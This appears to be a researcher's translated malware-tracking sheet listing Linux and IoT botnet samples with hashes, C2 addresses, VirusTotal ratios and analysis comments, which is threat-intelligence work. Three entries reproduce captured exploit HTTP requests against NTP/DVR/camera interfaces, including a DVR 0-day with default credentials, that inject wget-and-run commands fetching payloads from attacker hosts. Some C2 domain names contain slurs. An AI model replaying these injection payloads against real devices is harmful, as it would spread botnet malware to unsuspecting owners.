Sample tracking notes. Each entry below carries the fields of the original sheet: First Seen, Data Source, Threat Name, File Type, CPU Architecture, Sample MD5 / Payload, C2, VT Detection Ratio, Comments (translated to English), Twitter / Blog. Fields the original left empty are omitted.

First Seen: 20191209
Data Source: VirusTotal
File Type: ELF
CPU Architecture: x86-32
Sample MD5 / Payload: 25c5d70a0403a1477d03f23fb54dc894
C2: syn.l11l1.com:1888
VT Detection Ratio: 1
Comments:
  A bot sample from VirusTotal, currently with 1 detection on VirusTotal; its specific functionality has not been determined.
  md5: 25c5d70a0403a1477d03f23fb54dc894
  Suspected C2: syn.l11l1.com:1888
  Another associated ELF sample: b1fcab441a1221b33206924f12af64a0
  Suspected C2: ccyk.l11l1.com:178
  There is also another PE sample hosted at the C2 URL: http://syn.l11l1.com/yk.exe

First Seen: 20191125
Data Source: VirusTotal
File Type: ELF
CPU Architecture: x86-64
Sample MD5 / Payload: 2808d554258c9d93c44cf259f5627630
VT Detection Ratio: 0
Comments:
  This is a bot sample from VirusTotal, but it has already been analyzed by Intezer and written up on their blog.
  2808d554258c9d93c44cf259f5627630 (the sample I analyzed this morning; 0 detections on VirusTotal)
  2bef22301354ea36cfdf79d763f451d1 (a sample correlated through the C2 information; already analyzed by Intezer)
  https://www.intezer.com/blog-acbackdoor-analysis-of-a-new-multiplatform-backdoor/

First Seen: 20191120
Data Source: Anglerfish Honeypot
File Type: ELF
Sample MD5 / Payload:
  POST /html/sntp.html HTTP/1.1
  DNT: 1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 140
  Host: {target}
  sntpenable=1&pritimeserver=Other&otherpritimeserver=%60cd+%2Ftmp%3B+wget+http%3A%2F%2Fcncg.me%2Fz%60&timezone=0&save=Submit&submit=submitted
VT Detection Ratio: Not Support
Comments:
  An unknown exploit; the sample it spreads is Gafgyt.
  URL: http://cncg.me/z
Twitter / Blog: https://twitter.com/zom3y3/status/1201356330528722945

First Seen: 20191025
Data Source: VirusTotal
Threat Name: Linux.Dacls
File Type: ELF
CPU Architecture: x86-64
Sample MD5 / Payload: 80c0efb9e129f7f9b05a783df6959812
C2:
  TCP: 172.93.201.219:443
  TCP: 107.172.197.175:443
  TCP: 198.180.198.6:443
Comments:
  This is a new bot sample discovered last Friday. It comes from VirusTotal and currently has 7 detections (2 detections at the time of discovery). The backdoor functionality is complete.
  The bot program appears to contain 6 modules:
    /bin/bash (executes system commands)
    plugin_file (suspected file management)
    plugin_process (suspected process management)
    plugin_test (unknown)
    plugin_reverse_p2p (unknown)
    logsend (also contains some scanning / probing functionality)
  Three C2s are hardcoded:
    172.93.201.219:443
    107.172.197.175:443
    198.180.198.6:443
  From the sample itself no further information could be correlated; a YARA scan on VirusTotal turned up only this one sample.
Twitter / Blog: https://blog.netlab.360.com/dacls-the-dual-platform-rat-en/

First Seen: 20190830
Data Source: Anglerfish Honeypot
File Type: ELF
CPU Architecture: all
Sample MD5 / Payload: d7aa37dc9954509bcc26368f916d1fff
C2: 80.82.65.213:37420
VT Detection Ratio: 5
Comments:
  This sample scans TCP/34567 and appears to integrate a DVRIP 0-day exploit.
  The C2 is delivered via a DNS TXT record:
    dig typicalniggerdayatthecoolaidparty.n1gger.com TXT +short
    "80.82.65.213"
  C2: 80.82.65.213:37420
  https://www.virustotal.com/gui/file/5be892b089400fd57b1a0e200ea4c2510dd35afa557a1bd2c392cf8f6aa2f289/detection
Twitter / Blog: https://blog.netlab.360.com/the-botnet-cluster-on-185-244-25-0-24-en/

First Seen: 20190830
Data Source: Anglerfish Honeypot
Threat Name: LILIN DVR 0-day
File Type: ELF
CPU Architecture: arm
Sample MD5 / Payload:
  DVR
  POST /dvr/cmd HTTP/1.1
  Host: {target}:8000
  Accept-Encoding: gzip, deflate
  Connection: keep-alive
  Accept: */*
  User-Agent: python-requests/2.22.0
  Content-type: multipart/form-data; boundary=----DVRBoundary
  Content-Length: 356
  Authorization: Basic cm9vdDppY2F0Y2g5OQ==

  ------DVRBoundary
  Content-Disposition: form-data; name=""


  ------DVRBoundary
  Content-Disposition: form-data; name="command.xml"

  <?xml version="1.0" encoding="UTF-8" standalone="yes" ?><DVR Platform="Hi3520"><NTPUpdate Server="pool.ntp.org&wget http://103.27.185.139/icatch.1.3.23s -O /zconf/123; sh /zconf/123&true" /></DVR>
  ------DVRBoundary--
C2: http://lakusdvroa.com:8080/
VT Detection Ratio: Not Support
Comments:
  This looks like a new RCE exploit; I found no publicly disclosed vulnerability for it. The sample being spread has, as far as I can see, been tagged chalubo.
  10ac26ef8571896efa3ee9495c0b71f5 (sample, 0 detections on VirusTotal)
Twitter / Blog: https://blog.netlab.360.com/multiple-botnets-are-spreading-using-lilin-dvr-0-day-en/

First Seen: 20190826
Data Source: VirusTotal
Threat Name: Roboto
File Type: ELF
CPU Architecture: x86-64
Sample MD5 / Payload: 4cd7bcd0960a69500aa80f32762d72bc
C2:
  UDP: 186.46.45.252:52085
  UDP: 91.134.16.11:58436
  UDP: 120.150.43.45:49252
  UDP: 213.159.27.5:57491
  UDP: 66.113.179.13:33543
VT Detection Ratio: 2
Comments:
  This looks like a bot sample that communicates over P2P; the C2 nodes it currently connects to appear to be fixed. 2 detections on VirusTotal.
  Functionality unknown; judging by the strings it looks malicious.
  Known nodes:
    UDP: 186.46.45.252:52085
    UDP: 91.134.16.11:58436
    UDP: 120.150.43.45:49252
    UDP: 213.159.27.5:57491
    UDP: 66.113.179.13:33543
  https://analyze.intezer.com/#/analyses/d77c8d8e-50a6-4787-8a6d-a50e05f567e9
Twitter / Blog: https://blog.netlab.360.com/the-awaiting-roboto-botnet-en/

First Seen: 20190823
Data Source: VirusTotal
File Type: ELF
CPU Architecture: x86-64
Sample MD5 / Payload: 21e34a9286fb5856e7933519f28d32a3
VT Detection Ratio: 0
Comments:
  "渣兔" and I analyzed this for a good while. It really is a new botnet family, but it turned out to be a red team testing tool.
  I mistakenly thought the "domain.com" API was being abused to relay information and hide the C2.
  https://github.com/its-a-feature/Apfell

First Seen: 20190725
Data Source: VirusTotal
File Type: ELF
CPU Architecture: arm
Sample MD5 / Payload: df6d69bad17cc0863986e75032586e05
VT Detection Ratio: 10
Comments:
  This sample targets Antminer mining rigs (armhf): it hijacks the rig's wallet address, can scan for SSH and the Antminer web upgrade interface, and spreads laterally.
  VirusTotal already has many detections labelling it BitCoinMiner, but it is not actually a mining program.
  Related sample URLs:
    http://bitmsfser.info/bt/s2
    http://bitmsfser.info/bt/s
    http://bitmain.cool/bt/1u
  MD5 (s) = 1fe3e4cf9fd129de4250d62dc05f5b61
  MD5 (s2) = df6d69bad17cc0863986e75032586e05
  MD5 (1u) = f175e232a05ae8b186880f93ced92895

First Seen: 20190704
Data Source: Anglerfish Honeypot
File Type: ELF
CPU Architecture: all
Sample MD5 / Payload: 97491cd28573e693ef007c4e852421be
C2: raiseyourdongers.pw:6593
VT Detection Ratio: 0
Comments:
  This is a bot sample with 0 detections on VirusTotal. C2: raiseyourdongers.pw:6593. The file is named fbot, but it is unclear whether it is related to fbot: function similarity only shows a reference to the checksum function.
  http://5.206.227.65/codingdrunk/fbot.arm7

First Seen: 20190701
Data Source: Anglerfish Honeypot
File Type: ELF
CPU Architecture: all
Sample MD5 / Payload: 721c4c0f60546e8d4dda282d4207e92e
C2: cncc.duckdns.org:1800
VT Detection Ratio: 1
Comments:
  This is a bot sample with 1 detection on VirusTotal. C2: cncc.duckdns.org:1800. It has DDoS functionality and reuses the Mirai checksum code.
  2019-06-30 11:54:50 http://185.99.254.29/bins/arm7 a7a3ffbbd8b8ce7546f496f7b0412d9e ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped

First Seen: 20190613
Data Source: VirusTotal
File Type: ELF
CPU Architecture: x86
Sample MD5 / Payload: cf5b2c91c7b6f6cc72a99b9bb141e8ae
C2: 114.118.80.160:443
VT Detection Ratio: 1
Comments:
  This is a bot sample with 1 detection on VirusTotal. Suspected C2: 114.118.80.160:443 (currently inactive).
  md5: cf5b2c91c7b6f6cc72a99b9bb141e8ae

First Seen: 20190528
Data Source: VirusTotal
Threat Name: Linux.Ngioweb
File Type: ELF
CPU Architecture: all
Sample MD5 / Payload: 827ecf99001fa66de513fe5281ce064d
C2:
  169.239.128.166:443
  185.244.149.73:443
  enutofish-pronadimoful-multihitision.org:443
VT Detection Ratio: 0
Comments:
  This is a bot sample with 0 detections on VirusTotal.
  C2:
    169.239.128.166:443
    185.244.149.73:443
    enutofish-pronadimoful-multihitision.org:443
Twitter / Blog: https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/

First Seen: 20190513
Data Source: Anglerfish Honeypot
File Type: ELF
CPU Architecture: arm
Sample MD5 / Payload: c7f77db8cb3b353b9a238cd7e515de20
C2: cnc.mariokartayy.com:52869
VT Detection Ratio: 0
Comments:
  This is a bot sample with 0 detections on VirusTotal. C2: cnc.mariokartayy.com:52869. It supports 2 types of DDoS (UDP, TCP).
  md5: c7f77db8cb3b353b9a238cd7e515de20
Twitter / Blog: https://twitter.com/zom3y3/status/1128227886547079168

First Seen: 20190506
Data Source: VirusTotal
File Type: ELF
CPU Architecture: x86
Sample MD5 / Payload: 10c73149cdf2690e7e82b4aec40eb383
C2: 176.32.35.23:12956
VT Detection Ratio: 1
Comments:
  This is a bot sample with 1 detection on VirusTotal. It has DDoS functionality. C2: 176.32.35.23:12956
  SentinelOne ==> DFI - Malicious ELF
  10c73149cdf2690e7e82b4aec40eb383
Twitter / Blog: https://twitter.com/zom3y3/status/1126056561170714624

First Seen: 20190504
Data Source: Anglerfish Honeypot
Threat Name: Tsunami
File Type: ELF
CPU Architecture: x86
Sample MD5 / Payload: 8ad6a59dff8fd98529ffab0badec8187
C2: 54.36.212.123:8067
VT Detection Ratio: 24
Comments:
  It's a variant of the Tsunami botnet: it supports 22 types of DDoS attacks, kills 360+ known bots (by filename), contains 7 exploit methods and uses "fast-flux" technology to hide the download server.
  md5: 8ad6a59dff8fd98529ffab0badec8187
  c2: 54.36.212.123:8067
Twitter / Blog: https://twitter.com/zom3y3/status/1124971992916979712

First Seen: 20190424
Data Source: Anglerfish Honeypot
File Type: ELF
CPU Architecture: all
Sample MD5 / Payload: http://35.235.102.123:80/golang1/gobot.xxx
C2: uwsedrftgyhujikol.sytes.net:8080
Comments:
  It's a new family of IRC botnet that targets 4 types of operating systems: MacOS, Linux, FreeBSD and Windows.
Twitter / Blog: https://twitter.com/zom3y3/status/1126069110155034624

First Seen: 20190424
Data Source: Anglerfish Honeypot
Threat Name: Godlua
File Type: ELF
CPU Architecture: x86-64
Sample MD5 / Payload: 1b9de5b3118b1a745e2bfdecc71630f1
C2: c.heheda.tk:65314
VT Detection Ratio: 1
Comments:
  This is a bot sample. Suspected C2: c.heheda.tk:65314 (the C2 traffic appears to be encrypted).
  md5: 1b9de5b3118b1a745e2bfdecc71630f1
  1 detection on VirusTotal: DrWeb ==> Linux.Siggen.1594
  Related sample URLs:
    http://104.238.151.101/run.sh (this shell script is responsible for spreading kerberods; at the end of the file, JS mining, xmrig and a Python reverse shell are commented out)
    https://dd.heheda.tk/i.jpg (same content as run.sh, same md5)
    https://dd.heheda.tk/x86_64-static-linux-uclibc.jpg
Twitter / Blog: https://blog.netlab.360.com/an-analysis-of-godlua-backdoor-en/

First Seen: 20190410
Data Source: Anglerfish Honeypot
File Type: ELF
CPU Architecture: arm
Sample MD5 / Payload: 054ec18660bab0fc4da4d0495c840483
C2: 167.99.8.99:5010
VT Detection Ratio: 1
Comments:
  sample: http://167.99.8.99:80/nr.a6 054ec18660bab0fc4da4d0495c840483
  This is a bot sample; its DDoS functionality appears to still be under development. One vendor on VirusTotal detects it. Suspected C2: 167.99.8.99:5010
  Ikarus ==> Trojan.Linux.Agent
  Other related samples:
    http://167.99.8.99:80/nr.spc 7f82f7b3558c34058da0d49054f593c4
    http://167.99.8.99:80/nr.ppc 7e8b4b7271540685f342cee7f4e7c9c9
    http://167.99.8.99:80/nr.a6 054ec18660bab0fc4da4d0495c840483

First Seen: 20190409
Data Source: Anglerfish Honeypot
File Type: ELF
Sample MD5 / Payload:
  POST //webs/sysTimeCfgEx HTTP/1.1
  Host: {target}
  Accept-Encoding: identity
  Content-Length: 186
  systemdate=2019-3-27&systemtime=15:39:32&dwTimeZone=30&updatemode=0&ntpHost=$(wget http://181.174.166.164/welcom -O/tmp/welcome;/bin/sh ./tmp/welcome)&ntpPort=123&timezonecon=0
VT Detection Ratio: Not Support
Comments:
  An unknown exploit is targeting an IP camera device and loading the Mirai botnet.
  c2: 149.255.36.139:1747
  sample urls:
    http://181[.]174.166.164/welcom
    http://181[.]174.166.164/bl.arm
    http://181[.]174.166.164/bl.mips
    http://181[.]174.166.164/bl.mipsel
Twitter / Blog: https://twitter.com/zom3y3/status/1115481065701830657

First Seen: 20190325
Data Source: VirusTotal
File Type: ELF
CPU Architecture: mips
Sample MD5 / Payload: f00608d43e6c031501349a1dcae1ffda
C2: 80.211.245.39:1002
VT Detection Ratio: 1
Comments:
  A new botnet family, probably with c2: 80.211.245.39:1002
  sample: f00608d43e6c031501349a1dcae1ffda
Twitter / Blog: https://twitter.com/zom3y3/status/1110750663900684288

First Seen: 20190322
Data Source: VirusTotal
File Type: ELF
CPU Architecture: arm
Sample MD5 / Payload: http://103.242.118.63/intelligence/
C2: 172.104.182.244:30003
VT Detection Ratio: 0
Comments:
  It looks like someone is hunting for "NETGEAR R8000" and "Synology DiskStation" now, opening a reverse shell and a Tor proxy on the target device.
  1. open a reverse shell on port 12345 (limited access)
  2. open a Tor proxy on ports 20010 and 40010
  3. connect to 172.104.182.244:30003
Twitter / Blog: https://twitter.com/zom3y3/status/1109044920755482624

First Seen: 20190315
Data Source: Anglerfish Honeypot
File Type: ELF
CPU Architecture: mips
Sample MD5 / Payload: 1a45ca278567eebe9ef80ae579608fb0
C2: wpceservice.hldns.ru:1488
VT Detection Ratio: 0
Comments:
  This is a bot sample with 0 detections on VirusTotal. C2: wpceservice.hldns.ru:1488
  The C2 is alive; current command: newscan>37.115.151.0/8
Twitter / Blog: https://twitter.com/zom3y3/status/1110748371227041792

First Seen: 20190221
Data Source: VirusTotal
File Type: ELF
CPU Architecture: x86-64
Sample MD5 / Payload: 0a0232462faefa4f3e63c4e4709f1fd3
C2: bing.xxhost.ru:443
VT Detection Ratio: 0
Comments:
  This sample appears to be a SOCKS-proxy-related bot sample. Suspected c2: bing.xxhost.ru:443. 0 detections on VirusTotal.
Twitter / Blog: https://twitter.com/zom3y3/status/1098540349893427200

First Seen: 20190213
File Type: ELF
CPU Architecture: arm
Sample MD5 / Payload: 87ad0f2c375e0bc0055b44f41997517e
C2: ns3.clemenillivraytine.com:443
VT Detection Ratio: 4
Comments:
  Torii botnet, probably with c2: ns3[.]clemenillivraytine[.]com:443
  sample: 87ad0f2c375e0bc0055b44f41997517e
Twitter / Blog: https://twitter.com/zom3y3/status/1095611300992839680

First Seen: 20190109
Data Source: VirusTotal
File Type: ELF
CPU Architecture: x86-64
Sample MD5 / Payload: f7731ebf46e9547835836c2b495716aa
C2: http://1.oo00oo.info:80/bigc/srv/index.php
VT Detection Ratio: 0
Comments:
  md5: f7731ebf46e9547835836c2b495716aa
  This is a bot sample with 0 detections on VirusTotal. C2: http://1.oo00oo.info:80/bigc/srv/index.php
Twitter / Blog: https://twitter.com/zom3y3/status/1082850004593569792

First Seen: 20190104
Data Source: VirusTotal
File Type: ELF
CPU Architecture: x86-64
Sample MD5 / Payload: cb89554f12b71418151872fc3a2d6f57
C2: api.python-pip.win:80
VT Detection Ratio: 1
Comments:
  md5: cb89554f12b71418151872fc3a2d6f57
  This is a bot sample. C2: api.python-pip.win:80
  One antivirus vendor on VirusTotal detects it: Sophos ==> Linux/Rekoobe-B (a very old botnet, but it is unclear whether it has been updated or whether the detection is accurate).
Twitter / Blog: https://twitter.com/zom3y3/status/1081129900965150722

First Seen: 20181212
Data Source: VirusTotal
File Type: ELF
CPU Architecture: arm,mips
VT Detection Ratio: 0
Comments:
  Advanced IoT malware threat case, not publicly disclosed.

First Seen: 20181128
Data Source: VirusTotal
Threat Name: XorSSH
File Type: ELF
CPU Architecture: x86-64
Sample MD5 / Payload: 5495e84480a96ba3eb4b42fb41746e29
C2: scan9173.com:6006
VT Detection Ratio: 1
Comments:
  This is a bot sample; its code is a modified version of XorDDoS. C2: scan9173.com:6006
  Only one antivirus vendor on VirusTotal detects it: Rising flags it as Trojan.DDoS-Xor/Linux!1.A3E4 (CLASSIC)
  5495e84480a96ba3eb4b42fb41746e29
Twitter / Blog: https://twitter.com/zom3y3/status/1072353654366187520

First Seen: 20181126
Data Source: Anglerfish Honeypot
File Type: ELF
CPU Architecture: arm
Sample MD5 / Payload: 204b4cc2a99ba16b0651a627f3d47764
C2: 185.244.25.177:40721
VT Detection Ratio: 0
Comments:
  This sample belongs to a new botnet family, with 0 detections on VirusTotal. It has DDoS functionality. Suspected C2: 185.244.25.177:40721
  204b4cc2a99ba16b0651a627f3d47764
Twitter / Blog: https://twitter.com/zom3y3/status/1066902834032009217

First Seen: 20181123
Data Source: VirusTotal
Threat Name: ELF_IMEIJ
File Type: ELF
CPU Architecture: arm
Sample MD5 / Payload: 5cf13e9f1d988aa27a869dc5368f605a
C2: www.7895237.cn:9983
VT Detection Ratio: 1
Comments:
  This sample is an updated version of ELF_IMEIJ (jiemihttp). Trend Micro previously named it ELF_IMEIJ; a quick Google search turns up no follow-up reports since 2017.
  Compared with a16a281cbe544af40f8463c7f5186496, some updates can be seen, including TCP/UDP DDoS attack methods and newly added HTTPS CC attacks.
  5cf13e9f1d988aa27a869dc5368f605a
Twitter / Blog: https://twitter.com/zom3y3/status/1065930974075084800

First Seen: 20181123
Data Source: Anglerfish Honeypot
File Type: ELF
CPU Architecture: mips
Sample MD5 / Payload: 0329c69d07f674267740f4bef8914342
C2: 185.244.25.254:6129
VT Detection Ratio: 1
Comments:
  This is a bot sample. Suspected C2: 185.244.25.254:6129
  One antivirus vendor on VirusTotal detects it (Ikarus: Trojan.Linux.Tsunami), but that is clearly a false positive.
  0329c69d07f674267740f4bef8914342
Twitter / Blog: https://twitter.com/zom3y3/status/1065934749909151744

First Seen: 20181121
Data Source: Anglerfish Honeypot
File Type: ELF
CPU Architecture: arm
Sample MD5 / Payload: 39e4adea8c9c4e929892a5e7e453c105
C2: 46.243.189.102:432
VT Detection Ratio: 0
Comments:
  This is a bot sample with 0 detections on VirusTotal. Suspected c2: 46.243.189.102:432
  This IP has previously spread Mirai, so this may also be a Mirai variant, but its check-in protocol does not match Mirai's.
  39e4adea8c9c4e929892a5e7e453c105
Twitter / Blog: https://twitter.com/zom3y3/status/1065936809375350784

First Seen: 20181120
Data Source: VirusTotal
File Type: ELF
CPU Architecture: x86
Sample MD5 / Payload: 797e7153e2ddbad317a4f48a511acc32
C2: 51.microsft-update.com:178
VT Detection Ratio: 0
Comments:
  This is a bot sample with both Windows and Linux versions. It has been around for a while (captured in April 2018), and to this day it still has 0 detections on VirusTotal.
  c2: 51.microsft-update.com:178
  The sample's c2 domain and its Chinese strings are also quite interesting.
  797e7153e2ddbad317a4f48a511acc32
Twitter / Blog: https://twitter.com/zom3y3/status/1064840407308099584

First Seen: 20181120
Data Source: VirusTotal
File Type: ELF
CPU Architecture: x86-64
Sample MD5 / Payload: daca1d5e464d3320f90b773c1e355211
C2: seoseo.spider-baidu.com:80
VT Detection Ratio: 0
Comments:
  This is a bot sample from another new family, with 0 detections on VirusTotal. c2: seo.spider-sina.com:80
  The sample's check-in packet is a single string: gayman
  daca1d5e464d3320f90b773c1e355211
  A related sample, 03dac0129075bdde2138f2a12bc8c904, has already been detected by other antivirus vendors (文集 later judged it to be an unknown family that is detected only because it is packed).
  c2: seoseo.spider-baidu.com:80

First Seen: 20181119
Data Source: VirusTotal
File Type: ELF
CPU Architecture: x86-64
Sample MD5 / Payload: bcc79f90cf253c6fa6be10dcaec0f4ec
C2: 43.251.17.126:1882
VT Detection Ratio: 0
Comments:
  This is a bot sample with a C2 mechanism and 0 detections on VirusTotal. The sample's code shows traces of integrating some open-source code.
  Chinese strings can also be seen in the sample.
  bcc79f90cf253c6fa6be10dcaec0f4ec
  c2: 43.251.17.126:1882
Twitter / Blog: https://twitter.com/zom3y3/status/1064377926181769216

First Seen: 20181109
Data Source: VirusTotal
Threat Name: Satan
File Type: ELF
CPU Architecture: x86
Sample MD5 / Payload: 5a5676827c8c818d6d201e903109ec1e
C2: http://139.180.219.208/
VT Detection Ratio: 0
Comments:
  This sample belongs to the same group as 1e22346711916fb0b02964bb4a3d3a1a. It looks like a bot sample with a C2 mechanism; none of the antivirus engines on VirusTotal detected it.
  5a5676827c8c818d6d201e903109ec1e
Twitter / Blog: https://twitter.com/zom3y3/status/1062211186798653440